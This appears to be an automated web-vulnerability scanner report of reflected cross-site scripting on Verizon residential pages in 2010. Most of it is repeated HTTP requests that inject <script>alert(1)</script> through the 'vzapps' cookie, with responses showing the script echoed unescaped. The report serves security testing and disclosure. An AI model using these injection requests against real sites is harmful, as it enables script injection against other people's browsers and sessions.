GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX4dbaa'><script>alert(1)</script>f9ec6948bd6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 104007 Expires: Sat, 20 Nov 2010 00:10:02 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:10:02 GMT Connection: close Set-Cookie: ContextInfo_State=TX4dbaa'><script>alert(1)</script>f9ec6948bd6; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5be15'><script>alert(1)</script>3c4e8eb8b2a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX5be15'><script>alert(1)</script>3c4e8eb8b2a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 1817e<script>alert(1)</script>dabad9477e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX1817e<script>alert(1)</script>dabad9477e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8c400'><script>alert(1)</script>5e2533e5388 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8c400'><script>alert(1)</script>5e2533e5388; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload abbca<script>alert(1)</script>27fec1e0170 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXabbca<script>alert(1)</script>27fec1e0170; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70270'><script>alert(1)</script>55b92e6b12d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX70270'><script>alert(1)</script>55b92e6b12d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 33cf3<script>alert(1)</script>f0cf15e82f9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX33cf3<script>alert(1)</script>f0cf15e82f9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2fb11'><script>alert(1)</script>c9082fb4a68 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX2fb11'><script>alert(1)</script>c9082fb4a68; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 4a3fe<script>alert(1)</script>8693fabb78c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX4a3fe<script>alert(1)</script>8693fabb78c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18609'><script>alert(1)</script>38eb9406858 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Internet/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX18609'><script>alert(1)</script>38eb9406858; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 73121 Expires: Sat, 20 Nov 2010 00:10:11 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:10:11 GMT Connection: close Set-Cookie: ContextInfo_State=TX18609'><script>alert(1)</script>38eb9406858; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet </title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet ...[SNIP]... <input type='hidden' id='locationInfo' value='TX18609'><SCRIPT>ALERT(1)</SCRIPT>38EB9406858 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload a439f<script>alert(1)</script>4e7b1405640 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Internet/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXa439f<script>alert(1)</script>4e7b1405640; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 73116 Expires: Sat, 20 Nov 2010 00:11:06 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:06 GMT Connection: close Set-Cookie: ContextInfo_State=TXa439f<script>alert(1)</script>4e7b1405640; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet </title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TXA439F<SCRIPT>ALERT(1)</SCRIPT>4E7B1405640 </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a33c2'><script>alert(1)</script>e9e9cf39ae6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Services/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXa33c2'><script>alert(1)</script>e9e9cf39ae6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 55449 Expires: Sat, 20 Nov 2010 00:16:02 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:02 GMT Connection: close Set-Cookie: ContextInfo_State=TXa33c2'><script>alert(1)</script>e9e9cf39ae6; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2a62'><script>alert(1)</script>712158990f3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Services/BackupandSharing/BackupandSharing.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXd2a62'><script>alert(1)</script>712158990f3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 60755 Expires: Sat, 20 Nov 2010 00:16:09 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:09 GMT Connection: close Set-Cookie: ContextInfo_State=TXd2a62'><script>alert(1)</script>712158990f3; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Essential Services: Backup and Sharing </title><meta name="keywords" content="back up pc, backup pc, pc backup, back up Mac, back up Macin ...[SNIP]... <input type='hidden' id='locationInfo' value='TXD2A62'><SCRIPT>ALERT(1)</SCRIPT>712158990F3 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7daef'><script>alert(1)</script>c934f3f7b2c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Services/SecuritySuite/SecuritySuite.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX7daef'><script>alert(1)</script>c934f3f7b2c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 64651 Expires: Sat, 20 Nov 2010 00:16:17 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:17 GMT Connection: close Set-Cookie: ContextInfo_State=TX7daef'><script>alert(1)</script>c934f3f7b2c; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Essential Services: Internet Security Suite </title><meta name="keywords" description="anti-virus, firewall, anti-spyware, internet parent ...[SNIP]... <input type='hidden' id='locationInfo' value='TX7DAEF'><SCRIPT>ALERT(1)</SCRIPT>C934F3F7B2C ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5db1'><script>alert(1)</script>7ef783c9f97 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Services/TechnicalSupport/TechnicalSupport.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXc5db1'><script>alert(1)</script>7ef783c9f97; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 60724 Expires: Sat, 20 Nov 2010 00:16:16 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:16 GMT Connection: close Set-Cookie: ContextInfo_State=TXc5db1'><script>alert(1)</script>7ef783c9f97; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fc1d'><script>alert(1)</script>57067391278 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/TV/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8fc1d'><script>alert(1)</script>57067391278; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 76231 Expires: Sat, 20 Nov 2010 00:11:46 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:46 GMT Connection: close Set-Cookie: ContextInfo_State=TX8fc1d'><script>alert(1)</script>57067391278; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | FIOS TV + HD TV Service </title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl ...[SNIP]... <input type='hidden' id='locationInfo' value='TX8FC1D'><SCRIPT>ALERT(1)</SCRIPT>57067391278 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6c93f<script>alert(1)</script>ad59696c099 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/TV/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX6c93f<script>alert(1)</script>ad59696c099; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 74630 Expires: Sat, 20 Nov 2010 00:12:07 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:07 GMT Connection: close Set-Cookie: ContextInfo_State=TX6c93f<script>alert(1)</script>ad59696c099; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | FIOS TV + HD TV Service </title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX6C93F<SCRIPT>ALERT(1)</SCRIPT>AD59696C099 </DIV> ...[SNIP]...
